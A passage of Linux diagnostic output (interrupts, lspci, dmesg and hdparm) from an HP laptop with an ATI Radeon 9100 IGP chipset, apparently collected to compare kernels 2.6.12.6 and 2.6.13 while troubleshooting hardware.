0 0 IO-APIC-edge ide1 16: 28 0 IO-APIC-level ohci_hcd:usb4, yenta, ohci1394 17: 1 0 IO-APIC-level yenta 18: 0 0 IO-APIC-level ohci_hcd:usb5 19: 2 0 IO-APIC-level eth0, ehci_hcd:usb1, ohci_hcd:usb2, ohci_hcd:usb3 21: 43 0 IO-APIC-level acpi NMI: 0 0 LOC: 53271 53277 ERR: 0 MIS: 0 lspci -v 00:00.0 Host bridge: ATI Technologies Inc Radeon 9100 IGP Host Bridge (rev 02) Subsystem: ATI Technologies Inc: Unknown device 1234 Flags: bus master, 66Mhz, medium devsel, latency 64 Memory at d2000000 (32-bit, prefetchable) [size=32M] Memory at d0000000 (32-bit, non-prefetchable) [size=4K] Capabilities: [a0] AGP version 3.0 00:01.0 PCI bridge: ATI Technologies Inc Radeon 9100 IGP AGP Bridge (prog-if 00 [Normal decode]) Flags: bus master, 66Mhz, medium devsel, latency 99 Bus: primary=00, secondary=01, subordinate=01, sec-latency=68 I/O behind bridge: 00009000-00009fff Memory behind bridge: d0100000-d01fffff Prefetchable memory behind bridge: e0000000-efffffff 00:13.0 USB Controller: ATI Technologies Inc OHCI USB Controller #1 (rev 01) (prog-if 10 [OHCI]) Subsystem: ATI Technologies Inc: Unknown device 434c Flags: bus master, 66Mhz, medium devsel, latency 64, IRQ 19 Memory at d0001000 (32-bit, non-prefetchable) [size=4K] 00:13.1 USB Controller: ATI Technologies Inc OHCI USB Controller #2 (rev 01) (prog-if 10 [OHCI]) Subsystem: ATI Technologies Inc: Unknown device 434c Flags: bus master, 66Mhz, medium devsel, latency 64, IRQ 19 Memory at d0002000 (32-bit, non-prefetchable) [size=4K] 00:14.0 SMBus: ATI Technologies Inc ATI SMBus (rev 16) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: 66Mhz, medium devsel I/O ports at 8040 [size=16] Memory at 58000000 (32-bit, non-prefetchable) [size=1K] 00:14.1 IDE interface: ATI Technologies Inc ATI Dual Channel Bus Master PCI IDE Controller (prog-if 8a [Master SecP PriP]) Subsystem: ATI Technologies Inc ATI Dual Channel Bus Master PCI IDE Controller Flags: bus master, medium devsel, latency 64, IRQ 16 I/O ports at &lt;ignored&gt; I/O ports at &lt;ignored&gt; I/O ports at &lt;ignored&gt; I/O ports at &lt;ignored&gt; I/O ports at 8060 [size=16] 00:14.3 ISA bridge: ATI Technologies Inc: Unknown device 434c Subsystem: ATI Technologies Inc: Unknown device 434c Flags: bus master, 66Mhz, medium devsel, latency 0 00:14.4 PCI bridge: ATI Technologies Inc: Unknown device 4342 (prog-if 01 [Subtractive decode]) Flags: bus master, 66Mhz, medium devsel, latency 64 Bus: primary=00, secondary=02, subordinate=04, sec-latency=69 I/O behind bridge: 0000a000-0000afff Memory behind bridge: d0200000-d02fffff 00:14.5 Multimedia audio controller: ATI Technologies Inc IXP150 AC'97 Audio Controller Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, 66Mhz, slow devsel, latency 64, IRQ 5 Memory at d0003000 (32-bit, non-prefetchable) [size=256] 00:14.6 Modem: ATI Technologies Inc IXP AC'97 Modem (rev 01) (prog-if 00 [Generic]) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: 66Mhz, slow devsel, IRQ 5 Memory at d0003400 (32-bit, non-prefetchable) [size=256] 01:05.0 VGA compatible controller: ATI Technologies Inc RS300M AGP [Radeon Mobility 9100IGP] (prog-if 00 [VGA]) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, fast Back2Back, 66Mhz, medium devsel, latency 66, IRQ 10 Memory at e0000000 (32-bit, prefetchable) [size=256M] I/O ports at 9000 [size=256] Memory at d0100000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at &lt;unassigned&gt; [disabled] [size=128K] Capabilities: [58] AGP version 3.0 Capabilities: [50] Power Management version 2 02:00.0 FireWire (IEEE 1394): Texas Instruments TSB43AB21 IEEE-1394a-2000 Controller (PHY/Link) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, medium devsel, latency 64, IRQ 16 Memory at d0208000 (32-bit, non-prefetchable) [size=2K] Memory at d0200000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 02:02.0 Network controller: Broadcom Corporation BCM4306 802.11b/g Wireless LAN Controller (rev 03) Subsystem: Hewlett-Packard Company: Unknown device 12f4 Flags: bus master, fast devsel, latency 64, IRQ 5 Memory at d0204000 (32-bit, non-prefetchable) [size=8K] 02:03.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, medium devsel, latency 128, IRQ 19 I/O ports at a000 [size=256] Memory at d0208800 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 02:04.0 CardBus bridge: Texas Instruments PCI1620 PC Card Controller (rev 01) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, medium devsel, latency 168, IRQ 17 Memory at 58001000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=03, subordinate=06, sec-latency=176 Memory window 0: 58400000-587ff000 (prefetchable) Memory window 1: 58800000-58bff000 I/O window 0: 00004000-000040ff I/O window 1: 00004400-000044ff 16-bit legacy interface ports at 0001 02:04.1 CardBus bridge: Texas Instruments PCI1620 PC Card Controller (rev 01) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, medium devsel, latency 168, IRQ 16 Memory at 58002000 (32-bit, non-prefetchable) [size=4K] Bus: primary=02, secondary=07, subordinate=0a, sec-latency=176 Memory window 0: 58c00000-58fff000 (prefetchable) Memory window 1: 59000000-593ff000 I/O window 0: 00004800-000048ff I/O window 1: 00004c00-00004cff 16-bit legacy interface ports at 0001 02:04.2 System peripheral: Texas Instruments PCI1620 Firmware Loading Function (rev 01) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, medium devsel, latency 64 I/O ports at a400 [size=64] Capabilities: [44] Power Management version 2 02:07.0 USB Controller: NEC Corporation USB (rev 43) (prog-if 10 [OHCI]) Subsystem: NEC Corporation USB Flags: bus master, medium devsel, latency 64, IRQ 16 Memory at d0206000 (32-bit, non-prefetchable) [size=4K] Capabilities: [40] Power Management version 2 02:07.1 USB Controller: NEC Corporation USB (rev 43) (prog-if 10 [OHCI]) Subsystem: NEC Corporation USB Flags: bus master, medium devsel, latency 64, IRQ 18 Memory at d0207000 (32-bit, non-prefetchable) [size=4K] Capabilities: [40] Power Management version 2 02:07.2 USB Controller: NEC Corporation USB 2.0 (rev 04) (prog-if 20 [EHCI]) Subsystem: NEC Corporation USB 2.0 Flags: bus master, medium devsel, latency 64, IRQ 19 Memory at d0208c00 (32-bit, non-prefetchable) [size=256] Capabilities: [40] Power Management version 2 dmesg Linux version 2.6.12.6 (root@montroll.lan) (gcc version 3.4.4) #4 SMP Tue Aug 30 20:38:22 EDT 2005 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009f800 (usable) BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved) BIOS-e820: 00000000000d0000 - 00000000000d8000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 0000000047f70000 (usable) BIOS-e820: 0000000047f70000 - 0000000047f7d000 (ACPI data) BIOS-e820: 0000000047f7d000 - 0000000047f80000 (ACPI NVS) BIOS-e820: 0000000047f80000 - 0000000048000000 (reserved) BIOS-e820: 0000000057f80000 - 0000000058000000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved) Warning only 896MB will be used. Use a HIGHMEM enabled kernel. 896MB LOWMEM available. found SMP MP-table at 000f6570 On node 0 totalpages: 229376 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 225280 pages, LIFO batch:31 HighMem zone: 0 pages, LIFO batch:1 DMI present. ACPI: RSDP (v000 PTLTD ) @ 0x000f6600 ACPI: RSDT (v001 PTLTD RSDT 0x06040000 LTP 0x00000000) @ 0x47f791c8 ACPI: FADT (v001 HP Chinook 0x06040000 ATI 0x000f4240) @ 0x47f7ceed ACPI: MADT (v001 PTLTD APIC 0x06040000 LTP 0x00000000) @ 0x47f7cf61 ACPI: SSDT (v001 PTLTD ACPIHT 0x06040000 LTP 0x00000001) @ 0x47f7cfc9 ACPI: DSDT (v001 HP SB200 0x06040000 INTL 0x20030509) @ 0x00000000 ACPI: PM-Timer IO Port: 0x8008 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 15:2 APIC version 20 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) Processor #1 15:2 APIC version 20 ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 2, version 17, address 0xfec00000, GSI 0-23 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 high edge) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 21 low level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. Enabling APIC mode: Flat. Using 1 I/O APICs Using ACPI (MADT) for SMP configuration information Allocating PCI resources starting at 58000000 (gap: 58000000:a6c00000) Built 1 zonelists Kernel command line: BOOT_IMAGE=2.6.12.6 ro root=302 mapped APIC to ffffd000 (fee00000) mapped IOAPIC to ffffc000 (fec00000) Initializing CPU#0 PID hash table entries: 4096 (order: 12, 65536 bytes) Detected 3000.728 MHz processor. Using pmtmr for high-res timesource Console: colour VGA+ 80x25 Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 906084k/917504k available (1695k kernel code, 10908k reserved, 737k data, 192k init, 0k highmem) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay loop... 5963.77 BogoMIPS (lpj=2981888) Mount-cache hash table entries: 512 CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000 CPU: After vendor identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 0 CPU: After all inits, caps: bfebfbff 00000000 00000000 00000080 00004400 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU0: Intel P4/Xeon Extended MCE MSRs (12) available CPU0: Thermal monitoring enabled Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. CPU0: Intel(R) Pentium(R) 4 CPU 3.00GHz stepping 09 Booting processor 1/1 eip 3000 Initializing CPU#1 Calibrating delay loop... 5996.54 BogoMIPS (lpj=2998272) CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000 CPU: After vendor identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 0 CPU: After all inits, caps: bfebfbff 00000000 00000000 00000080 00004400 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#1. CPU1: Intel P4/Xeon Extended MCE MSRs (12) available CPU1: Thermal monitoring enabled CPU1: Intel(R) Pentium(R) 4 CPU 3.00GHz stepping 09 Total of 2 processors activated (11960.32 BogoMIPS). ENABLING IO-APIC IRQs ..TIMER: vector=0x31 pin1=2 pin2=-1 checking TSC synchronization across 2 CPUs: passed. Brought up 2 CPUs CPU0 attaching sched-domain: domain 0: span 3 groups: 1 2 domain 1: span 3 groups: 3 CPU1 attaching sched-domain: domain 0: span 3 groups: 2 1 domain 1: span 3 groups: 3 NET: Registered protocol family 16 PCI: PCI BIOS revision 2.10 entry at 0xfd968, last bus=2 PCI: Using configuration type 1 mtrr: v2.0 (20020519) ACPI: Subsystem revision 20050309 ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) PCI: Ignoring BAR0-3 of IDE controller 0000:00:14.1 Boot video device is 0000:01:05.0 PCI: Transparent bridge - 0000:00:14.4 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.AGPB._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P2P_._PRT] ACPI: PCI Interrupt Link [LNK0] (IRQs 5 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNK1] (IRQs 5 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNK2] (IRQs 5 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNK3] (IRQs 5 10 11) *0, disabled. ACPI: Embedded Controller [EC0] (gpe 6) PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report Machine check exception polling timer started. Initializing Cryptographic API ACPI: AC Adapter [ACAD] (on-line) ACPI: Battery Slot [BAT1] (battery present) ACPI: Power Button (FF) [PWRF] ACPI: Lid Switch [LID] ACPI: Thermal Zone [THRM] (52 C) Real Time Clock Driver v1.12 i8042.c: Detected active multiplexing controller, rev 1.1. serio: i8042 AUX0 port at 0x60,0x64 irq 12 serio: i8042 AUX1 port at 0x60,0x64 irq 12 serio: i8042 AUX2 port at 0x60,0x64 irq 12 serio: i8042 AUX3 port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ATIIXP: IDE controller at PCI slot 0000:00:14.1 ACPI: PCI Interrupt 0000:00:14.1[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 ATIIXP: chipset revision 0 ATIIXP: not 100% native mode: will probe irqs later ide0: BM-DMA at 0x8060-0x8067, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0x8068-0x806f, BIOS settings: hdc:DMA, hdd:pio Probing IDE interface ide0... hda: ST9100823A, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 Probing IDE interface ide1... hdc: SD-R2512, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 Probing IDE interface ide2... Probing IDE interface ide3... Probing IDE interface ide4... Probing IDE interface ide5... hda: max request size: 128KiB hda: 195371568 sectors (100030 MB) w/8192KiB Cache, CHS=65535/16/63, UDMA(100) hda: cache flushes supported hda: hda1 hda2 mice: PS/2 mouse device common for all mice input: PC Speaker NET: Registered protocol family 2 IP: routing cache hash table of 4096 buckets, 64Kbytes TCP established hash table entries: 131072 (order: 9, 2097152 bytes) TCP bind hash table entries: 65536 (order: 7, 786432 bytes) TCP: Hash tables configured (established 131072 bind 65536) NET: Registered protocol family 1 NET: Registered protocol family 15 ACPI wakeup devices: ELAN USB0 USB1 USB2 KBC0 MSE0 ACPI: (supports S0 S3 S4 S5) kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 192k freed input: AT Translated Set 2 keyboard on isa0060/serio0 alps.c: Enabling hardware tapping input: PS/2 Mouse on isa0060/serio4 input: AlpsPS/2 ALPS GlidePoint on isa0060/serio4 Adding 977216k swap on /dev/hda1. Priority:-1 extents:1 EXT3 FS on hda2, internal journal Linux agpgart interface v0.101 (c) Dave Jones 8139too Fast Ethernet driver 0.9.27 ACPI: PCI Interrupt 0000:02:03.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 eth0: RealTek RTL8139 at 0xa000, 00:0f:b0:01:82:2d, IRQ 19 eth0: Identified 8139 chip type 'RTL-8101' eth0: link up, 10Mbps, half-duplex, lpa 0x0000 usbcore: registered new driver usbfs usbcore: registered new driver hub ACPI: PCI Interrupt 0000:02:07.2[C] -&gt; GSI 19 (level, low) -&gt; IRQ 19 ehci_hcd 0000:02:07.2: NEC Corporation USB 2.0 ehci_hcd 0000:02:07.2: new USB bus registered, assigned bus number 1 ehci_hcd 0000:02:07.2: irq 19, io mem 0xd0208c00 ehci_hcd 0000:02:07.2: park 0 ehci_hcd 0000:02:07.2: USB 2.0 initialized, EHCI 1.00, driver 10 Dec 2004 hub 1-0:1.0: USB hub found hub 1-0:1.0: 5 ports detected ohci_hcd: 2004 Nov 08 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) ACPI: PCI Interrupt 0000:00:13.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 ohci_hcd 0000:00:13.0: ATI Technologies Inc OHCI USB Controller #1 ohci_hcd 0000:00:13.0: new USB bus registered, assigned bus number 2 ohci_hcd 0000:00:13.0: irq 19, io mem 0xd0001000 hub 2-0:1.0: USB hub found hub 2-0:1.0: 3 ports detected ACPI: PCI Interrupt 0000:00:13.1[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 ohci_hcd 0000:00:13.1: ATI Technologies Inc OHCI USB Controller #2 ohci_hcd 0000:00:13.1: new USB bus registered, assigned bus number 3 ohci_hcd 0000:00:13.1: irq 19, io mem 0xd0002000 hub 3-0:1.0: USB hub found hub 3-0:1.0: 3 ports detected ACPI: PCI Interrupt 0000:02:07.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 ohci_hcd 0000:02:07.0: NEC Corporation USB ohci_hcd 0000:02:07.0: new USB bus registered, assigned bus number 4 ohci_hcd 0000:02:07.0: irq 16, io mem 0xd0206000 hub 4-0:1.0: USB hub found hub 4-0:1.0: 3 ports detected ACPI: PCI Interrupt 0000:02:07.1[B] -&gt; GSI 18 (level, low) -&gt; IRQ 18 ohci_hcd 0000:02:07.1: NEC Corporation USB (#2) ohci_hcd 0000:02:07.1: new USB bus registered, assigned bus number 5 ohci_hcd 0000:02:07.1: irq 18, io mem 0xd0207000 hub 5-0:1.0: USB hub found hub 5-0:1.0: 2 ports detected usb 4-1: new low speed USB device using ohci_hcd and address 2 Linux Kernel Card Services options: [pci] [cardbus] [pm] ACPI: PCI Interrupt 0000:02:04.0[A] -&gt; GSI 17 (level, low) -&gt; IRQ 17 Yenta: CardBus bridge found at 0000:02:04.0 [103c:006b] Yenta: Enabling burst memory read transactions Yenta: Using CSCINT to route CSC interrupts to PCI Yenta: Routing CardBus interrupts to PCI Yenta TI: socket 0000:02:04.0, mfunc 0x01111d22, devctl 0x64 Yenta: ISA IRQ mask 0x0ed8, PCI irq 17 Socket status: 30000006 ACPI: PCI Interrupt 0000:02:04.1[B] -&gt; GSI 16 (level, low) -&gt; IRQ 16 Yenta: CardBus bridge found at 0000:02:04.1 [103c:006b] Yenta: Using CSCINT to route CSC interrupts to PCI Yenta: Routing CardBus interrupts to PCI Yenta TI: socket 0000:02:04.1, mfunc 0x01111d22, devctl 0x64 input: USB HID v1.10 Mouse [Logitech USB Receiver] on usb-0000:02:07.0-1 usbcore: registered new driver usbhid drivers/usb/input/hid-core.c: v2.01:USB HID core driver Yenta: ISA IRQ mask 0x0ed8, PCI irq 16 Socket status: 30000006 ieee1394: Initialized config rom entry `ip1394' ohci1394: $Rev: 1250 $ Ben Collins &lt;bcollins@debian.org&gt; ACPI: PCI Interrupt 0000:02:00.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[16] MMIO=[d0208000-d02087ff] Max Packet=[2048] Serial: 8250/16550 driver $Revision: 1.90 $ 8 ports, IRQ sharing disabled ACPI: PCI Interrupt 0000:00:14.6[B] -&gt; GSI 5 (level, low) -&gt; IRQ 5 ACPI: PCI Interrupt 0000:00:14.5[B] -&gt; GSI 5 (level, low) -&gt; IRQ 5 agpgart: Detected Ati IGP9100/M chipset agpgart: AGP aperture is 32M @ 0xd2000000 ieee1394: Host added: ID:BUS[0-00:1023] GUID[463f02005c594058] eth1394: $Rev: 1247 $ Ben Collins &lt;bcollins@debian.org&gt; eth1394: eth1: IEEE-1394 IPv4 over 1394 Ethernet (fw-host0) USB Universal Host Controller Interface driver v2.2 ip_tables: (C) 2000-2002 Netfilter core team ip_conntrack version 2.1 (7168 buckets, 57344 max) - 256 bytes per conntrack Installing knfsd (copyright (C) 1996 okir@monad.swb.de). hdparm /dev/hda /dev/hda: multcount = 16 (on) IO_support = 1 (32-bit) unmaskirq = 0 (off) using_dma = 1 (on) keepsettings = 0 (off) readonly = 0 (off) readahead = 256 (on) geometry = 65535/16/63, sectors = 195371568, start = 0 hdparm -i /dev/hda /dev/hda: Model=ST9100823A, FwRev=3.00, SerialNo=3LG0V6AP Config={ HardSect NotMFM HdSw&gt;15uSec Fixed DTR&gt;10Mbs RotSpdTol&gt;.5% } RawCHS=16383/16/63, TrkSize=0, SectSize=0, ECCbytes=4 BuffType=unknown, BuffSize=8192kB, MaxMultSect=16, MultSect=16 CurCHS=16383/16/63, CurSects=16514064, LBA=yes, LBAsects=195371568 IORDY=on/off, tPIO={min:240,w/IORDY:120}, tDMA={min:120,rec:120} PIO modes: pio0 pio1 pio2 pio3 pio4 DMA modes: mdma0 mdma1 mdma2 UDMA modes: udma0 udma1 udma2 udma3 udma4 *udma5 AdvancedPM=yes: unknown setting WriteCache=enabled Drive conforms to: ATA/ATAPI-6 T13 1410D revision 2: ATA/ATAPI-1 ATA/ATAPI-2 ATA/ATAPI-3 ATA/ATAPI-4 ATA/ATAPI-5 ATA/ATAPI-6 * signifies the current active mode hdparm -I /dev/hda /dev/hda: ATA device, with non-removable media Model Number: ST9100823A Serial Number: 3LG0V6AP Firmware Revision: 3.00 Standards: Used: ATA/ATAPI-6 T13 1410D revision 2 Supported: 6 5 4 3 Configuration: Logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- CHS current addressable sectors: 16514064 LBA user addressable sectors: 195371568 device size with M = 1024*1024: 95396 MBytes device size with M = 1000*1000: 100030 MBytes (100 GB) Capabilities: LBA, IORDY(can be disabled) bytes avail on r/w long: 4 Queue depth: 1 Standby timer values: spec'd by Standard, no device specific minimum R/W multiple sector transfer: Max = 16 Current = 16 Advanced power management level: unknown setting (0x8080) Recommended acoustic management value: 254, current value: 0 DMA: mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 *udma5 Cycle time: min=120ns recommended=120ns PIO: pio0 pio1 pio2 pio3 pio4 Cycle time: no flow control=240ns IORDY flow control=120ns Commands/features: Enabled Supported: * READ BUFFER cmd * WRITE BUFFER cmd * Host Protected Area feature set * Look-ahead * Write cache * Power Management feature set Security Mode feature set * SMART feature set * Mandatory FLUSH CACHE command * Device Configuration Overlay feature set SET MAX security extension * Advanced Power Management feature set * DOWNLOAD MICROCODE cmd * SMART self-test * SMART error logging Security: Master password revision code = 65534 supported not enabled not locked frozen not expired: security count not supported: enhanced erase HW reset results: CBLID- above Vih Device num = 0 Checksum: correct hdparm -I /dev/hda /dev/hda: ATA device, with non-removable media Model Number: ST9100823A Serial Number: 3LG0V6AP Firmware Revision: 3.00 Standards: Used: ATA/ATAPI-6 T13 1410D revision 2 Supported: 6 5 4 3 Configuration: Logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- CHS current addressable sectors: 16514064 LBA user addressable sectors: 195371568 device size with M = 1024*1024: 95396 MBytes device size with M = 1000*1000: 100030 MBytes (100 GB) Capabilities: LBA, IORDY(can be disabled) bytes avail on r/w long: 4 Queue depth: 1 Standby timer values: spec'd by Standard, no device specific minimum R/W multiple sector transfer: Max = 16 Current = 16 Advanced power management level: unknown setting (0x8080) Recommended acoustic management value: 254, current value: 0 DMA: mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 *udma5 Cycle time: min=120ns recommended=120ns PIO: pio0 pio1 pio2 pio3 pio4 Cycle time: no flow control=240ns IORDY flow control=120ns Commands/features: Enabled Supported: * READ BUFFER cmd * WRITE BUFFER cmd * Host Protected Area feature set * Look-ahead * Write cache * Power Management feature set Security Mode feature set * SMART feature set * Mandatory FLUSH CACHE command * Device Configuration Overlay feature set SET MAX security extension * Advanced Power Management feature set * DOWNLOAD MICROCODE cmd * SMART self-test * SMART error logging Security: Master password revision code = 65534 supported not enabled not locked frozen not expired: security count not supported: enhanced erase HW reset results: CBLID- above Vih Device num = 0 Checksum: correct hdparm -t /dev/hda /dev/hda: Timing buffered disk reads: 102 MB in 3.05 seconds = 33.48 MB/sec hdparm -T /dev/hda /dev/hda: Timing cached reads: 1296 MB in 2.00 seconds = 648.10 MB/sec Now for 2.6.13 cat /proc/interrupts CPU0 CPU1 0: 345156 3 IO-APIC-edge timer 1: 51 2 IO-APIC-edge i8042 5: 1 0 IO-APIC-level ATI IXP 8: 1 0 IO-APIC-edge rtc 12: 121 0 IO-APIC-edge i8042 14: 5474 0 IO-APIC-edge ide0 15: 0 0 IO-APIC-edge ide1 16: 1 0 IO-APIC-level yenta 17: 29 0 IO-APIC-level ohci_hcd:usb4, yenta, ohci1394 18: 2 0 IO-APIC-level eth0, ehci_hcd:usb1, ohci_hcd:usb2, ohci_hcd:usb3 19: 0 0 IO-APIC-level ohci_hcd:usb5 21: 40 0 IO-APIC-level acpi NMI: 0 0 LOC: 345004 345037 ERR: 0 MIS: 0 lspci -v 00:00.0 Host bridge: ATI Technologies Inc Radeon 9100 IGP Host Bridge (rev 02) Subsystem: ATI Technologies Inc: Unknown device 1234 Flags: bus master, 66Mhz, medium devsel, latency 64 Memory at d2000000 (32-bit, prefetchable) [size=32M] Memory at d0000000 (32-bit, non-prefetchable) [size=4K] Capabilities: [a0] AGP version 3.0 00:01.0 PCI bridge: ATI Technologies Inc Radeon 9100 IGP AGP Bridge (prog-if 00 [Normal decode]) Flags: bus master, 66Mhz, medium devsel, latency 99 Bus: primary=00, secondary=01, subordinate=01, sec-latency=68 I/O behind bridge: 00009000-00009fff Memory behind bridge: d0100000-d01fffff Prefetchable memory behind bridge: e0000000-efffffff 00:13.0 USB Controller: ATI Technologies Inc OHCI USB Controller #1 (rev 01) (prog-if 10 [OHCI]) Subsystem: ATI Technologies Inc: Unknown device 434c Flags: bus master, 66Mhz, medium devsel, latency 64, IRQ 18 Memory at d0001000 (32-bit, non-prefetchable) [size=4K] 00:13.1 USB Controller: ATI Technologies Inc OHCI USB Controller #2 (rev 01) (prog-if 10 [OHCI]) Subsystem: ATI Technologies Inc: Unknown device 434c Flags: bus master, 66Mhz, medium devsel, latency 64, IRQ 18 Memory at d0002000 (32-bit, non-prefetchable) [size=4K] 00:14.0 SMBus: ATI Technologies Inc ATI SMBus (rev 16) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: 66Mhz, medium devsel I/O ports at 8040 [size=16] Memory at 64000000 (32-bit, non-prefetchable) [size=1K] 00:14.1 IDE interface: ATI Technologies Inc ATI Dual Channel Bus Master PCI IDE Controller (prog-if 8a [Master SecP PriP]) Subsystem: ATI Technologies Inc ATI Dual Channel Bus Master PCI IDE Controller Flags: bus master, medium devsel, latency 64, IRQ 17 I/O ports at &lt;ignored&gt; I/O ports at &lt;ignored&gt; I/O ports at &lt;ignored&gt; I/O ports at &lt;ignored&gt; I/O ports at 8060 [size=16] 00:14.3 ISA bridge: ATI Technologies Inc: Unknown device 434c Subsystem: ATI Technologies Inc: Unknown device 434c Flags: bus master, 66Mhz, medium devsel, latency 0 00:14.4 PCI bridge: ATI Technologies Inc: Unknown device 4342 (prog-if 01 [Subtractive decode]) Flags: bus master, 66Mhz, medium devsel, latency 64 Bus: primary=00, secondary=02, subordinate=04, sec-latency=69 I/O behind bridge: 0000a000-0000afff Memory behind bridge: d0200000-d02fffff Prefetchable memory behind bridge: 60000000-63ffffff 00:14.5 Multimedia audio controller: ATI Technologies Inc IXP150 AC'97 Audio Controller Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, 66Mhz, slow devsel, latency 64, IRQ 5 Memory at d0003000 (32-bit, non-prefetchable) [size=256] 00:14.6 Modem: ATI Technologies Inc IXP AC'97 Modem (rev 01) (prog-if 00 [Generic]) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: 66Mhz, slow devsel, IRQ 5 Memory at d0003400 (32-bit, non-prefetchable) [size=256] 01:05.0 VGA compatible controller: ATI Technologies Inc RS300M AGP [Radeon Mobility 9100IGP] (prog-if 00 [VGA]) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, fast Back2Back, 66Mhz, medium devsel, latency 66, IRQ 10 Memory at e0000000 (32-bit, prefetchable) [size=256M] I/O ports at 9000 [size=256] Memory at d0100000 (32-bit, non-prefetchable) [size=64K] Expansion ROM at d0120000 [disabled] [size=128K] Capabilities: [58] AGP version 3.0 Capabilities: [50] Power Management version 2 02:00.0 FireWire (IEEE 1394): Texas Instruments TSB43AB21 IEEE-1394a-2000 Controller (PHY/Link) (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company: Unknown device 006b Flags: bus master, medium devsel, latency 64, IRQ 17 Memory at d0208000 (32-bit, non-prefetchable) [size=2K] Memory at d0200000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 02:02.0 Network controller: Broadcom Corporation BCM4306 802.11b/g Wireless LAN Controller (rev 03) Subsystem: Hewlett-Packard Company: Unknown device 12f4 Flags: bus master, fast devsel, latency 64, IRQ 5 Memory at d0204000 (32-bit, non-prefetchable) [size=8K] 02:03.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: Hewlett-Packard Company: Unknown 